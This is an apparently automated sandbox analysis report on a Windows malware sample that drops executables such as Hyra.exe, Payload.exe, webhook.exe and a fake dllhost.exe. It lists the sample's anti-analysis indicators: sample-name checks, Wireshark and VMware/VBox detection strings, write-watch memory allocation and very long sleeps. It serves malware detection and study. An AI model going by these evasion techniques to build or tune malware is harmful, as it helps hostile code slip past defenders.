Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

.NET source code contains a sample name check

Source: virus.exe.bin.exe, Module1.cs	.Net Code: Main contains sample name check
Source: Hyra.exe.0.dr, Module1.cs	.Net Code: Main contains sample name check
Source: final.exe.2.dr, Module1.cs	.Net Code: Main contains sample name check

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: virus.exe.bin.exe, 00000000.00000002.1457358254.0000000013560000.00000004.00000800.00020000.00000000.sdmp, Hyra.exe, 00000002.00000002.1558924287.0000000012AB5000.00000004.00000800.00020000.00000000.sdmp, final.exe, 0000000B.00000002.1629517817.0000000013345000.00000004.00000800.00020000.00000000.sdmp, final.exe, 0000000B.00000002.1598765313.000000000337B000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: WIRESHARK.EXE

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\Desktop\virus.exe.bin.exe	Memory allocated: 1780000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\virus.exe.bin.exe	Memory allocated: 3550000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\virus.exe.bin.exe	Memory allocated: 1B550000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Memory allocated: B00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Memory allocated: 2AA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Memory allocated: 1AAA0000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	Memory allocated: 15D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	Memory allocated: 3330000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	Memory allocated: 1B330000 memory commit \| memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Memory allocated: E20000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Memory allocated: 2A60000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Memory allocated: 4A60000 memory commit \| memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Memory allocated: C40000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Memory allocated: 2820000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Memory allocated: 4820000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Memory allocated: 870000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Memory allocated: 2680000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Memory allocated: AD0000 memory commit \| memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Memory allocated: 6200000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Memory allocated: 7200000 memory commit \| memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Memory allocated: 7360000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Memory allocated: 8360000 memory commit \| memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Memory allocated: AC0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Memory allocated: 2A10000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Memory allocated: 4A10000 memory commit \| memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Memory allocated: 5CF0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Memory allocated: 6CF0000 memory commit \| memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Memory allocated: DD0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Memory allocated: 2C90000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Memory allocated: 1050000 memory commit \| memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Memory allocated: BF0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Memory allocated: 2960000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Memory allocated: C60000 memory commit \| memory reserve \| memory write watch

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Desktop\virus.exe.bin.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Thread delayed: delay time: 598916
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Thread delayed: delay time: 598625
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Thread delayed: delay time: 598409
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Thread delayed: delay time: 598260
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Thread delayed: delay time: 598063
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Thread delayed: delay time: 597625
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Thread delayed: delay time: 922337203685477

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer			Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 560	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 490	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1449	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2040
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Window / User API: threadDelayed 1396
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Window / User API: threadDelayed 742
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Window / User API: threadDelayed 834

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\virus.exe.bin.exe TID: 7160	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe TID: 6320	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1556	Thread sleep count: 560 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5116	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4072	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1516	Thread sleep count: 490 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4196	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2788	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4892	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2824	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3272	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe TID: 5576	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe TID: 596	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe TID: 6408	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe TID: 5028	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe TID: 6428	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe TID: 6428	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe TID: 6428	Thread sleep time: -598916s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe TID: 6428	Thread sleep time: -598625s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe TID: 6428	Thread sleep time: -598409s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe TID: 6428	Thread sleep time: -598260s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe TID: 6428	Thread sleep time: -598063s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe TID: 6428	Thread sleep time: -597625s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4488	Thread sleep count: 2040 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3244	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4924	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\dllhost.exe TID: 5208	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\dllhost.exe TID: 2332	Thread sleep time: -698000s >= -30000s
Source: C:\Users\user\AppData\Roaming\dllhost.exe TID: 2332	Thread sleep time: -417000s >= -30000s
Source: C:\Users\user\AppData\Roaming\dllhost.exe TID: 2028	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\dllhost.exe TID: 4080	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\dllhost.exe TID: 4108	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Users\user\AppData\Roaming\dllhost.exe TID: 2792	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\dllhost.exe TID: 4948	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\dllhost.exe TID: 5088	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\dllhost.exe TID: 3608	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\dllhost.exe TID: 2716	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\dllhost.exe TID: 3744	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\Desktop\virus.exe.bin.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Thread delayed: delay time: 598916
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Thread delayed: delay time: 598625
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Thread delayed: delay time: 598409
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Thread delayed: delay time: 598260
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Thread delayed: delay time: 598063
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Thread delayed: delay time: 597625
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Thread delayed: delay time: 922337203685477

Source: powershell.exe, 00000009.00000002.2371660342.000002542A6B6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\pSo*T
Source: javaw.exe, 0000000C.00000003.1476564419.00000000148C2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: com/sun/corba/se/impl/util/SUNVMCID.classPK
Source: powershell.exe, 00000009.00000002.2371660342.000002542A6B6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}T
Source: javaw.exe, 0000000C.00000003.1476564419.00000000148C2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: &com/sun/corba/se/impl/util/SUNVMCID.classPK
Source: powershell.exe, 00000009.00000002.2371660342.000002542A6F3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: final.exe, 0000000B.00000002.1598765313.000000000337B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VBoxService%\\.\PhysicalDrive0
Source: javaw.exe, 0000000C.00000002.3906245228.0000000000918000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [Ljava/lang/VirtualMachineError;
Source: javaw.exe, 0000000C.00000003.1476564419.00000000148C2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: org/omg/CORBA/OMGVMCID.classPK
